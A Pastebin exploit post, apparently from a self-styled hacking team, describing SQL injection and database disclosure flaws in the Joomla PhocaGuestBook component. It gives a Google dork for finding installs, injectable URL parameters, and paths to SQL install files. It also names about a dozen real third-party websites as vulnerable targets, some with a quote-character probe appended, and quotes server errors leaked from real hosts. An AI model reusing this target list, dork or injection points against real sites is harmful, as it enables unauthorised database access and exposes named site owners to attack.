Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla PhocaGuestBook 3.0.8 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 12/02/2019
- # Vendor Homepage : phoca.cz/phocaguestbook
- # Software Download Link : phoca.cz/download/category/5-phoca-guestbook-component
- github.com/PhocaCz/PhocaGuestbook/
- # Software Information Link : extensions.joomla.org/extension/phoca-guestbook/
- # Software Affected Versions : 1.4.5 - 1.5.3 - 2.0.2 - 2.0.7 - 3.0.2 - 3.0.5 - 3.0.6 - 3.0.8
- # Software Technical Requirements : Joomla! 1.5. Joomla! 2.5, Joomla! 3.x (stable or any later version)
- PHP 4, 5 (or any later version) with GD library (graphics library for CAPTCHA creation)
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_phocaguestbook''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-200 [ Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Phoca Guestbook is Joomla! CMS extension. Component which displays guestbook
- and its entries on website. Phoca Guestbook is a Joomla! component.
- It is a guestbook with Anti-Spam protection which can be used as guestbook
- or contact form. Contact form is protected by Anti-Spam methods and emails
- with contact content can be sent to selected user.
- ####################################################################
- # Impact :
- ***********
- * Joomla PhocaGuestBook 3.0.8 and other versions -
- component for Joomla is prone to an SQL-injection vulnerability because it
- fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * This Software prone to an information exposure/database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information including unencrypted authentication credentials.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_phocaguestbook&view=[SQL Injection]
- /index.php?option=com_phocaguestbook&id=[SQL Injection]
- /index.php?option=com_phocaguestbook&view=phocaguestbook&id=[SQL Injection]
- /index.php?option=com_phocaguestbook&view=phocaguestbook&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_phocaguestbook&view=guestbooki&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&phocasid=[SQL Injection]
- /index.php?option=com_phocaguestbook&view=phocaguestbook&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_phocaguestbook/install.sql
- /administrator/components/com_phocaguestbook/uninstall.sql
- /administrator/components/com_phocaguestbookinstall/sql/mysql/install.utf8.sql
- /administrator/components/com_phocaguestbookinstall/sql/mysql/uninstall.utf8.sql
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] rugbywinterthur.ch/rcwinti/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=13
- [+] aziendaagricolagiuliana.it/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=104
- [+] parcimonie.ch/pages/index.php?option=com_phocaguestbook&view=1%27
- [+] tobytompkins.com/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=55
- [+] weltumsegeln.ch/neu/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=55
- [+] illasapo.nl/index.php?option=com_phocaguestbook&id=1
- [+] ubezpieczenia-krosno.pl/index.php?option=com_phocaguestbook&id=1
- [+] location-motopiste.com/index.php?option=com_phocaguestbook&view=guestbooki&id=1&Itemid=482&phocasid=1%27
- [+] zd-sevnica.si/index.php?option=com_phocaguestbook&view=phocaguestbook&id=2
- [+] falkenforum.de/falkencamp2009_cms/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=64
- [+] loucky.info/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&
- [+] carine-justin.simhom.com/index.php?option=com_phocaguestbook&view=phocaguestbook&id=1&Itemid=223&limitstart=20
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Strict Standards: Non-static method PhocaguestbookHelperFront::getDateFormat()
- should not be called statically, assuming $this from incompatible context in
- /var/www/vh196207/data/www/sch-33.ru/components/com_phocaguestbook
- /views/guestbook/view.html.php on line 64
- Warning: mysql_num_rows() expects parameter 1 to be resource, boolean
- given in /home/zdsevnica/public_html/libraries/joomla/database
- /database/mysql.php on line 345
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment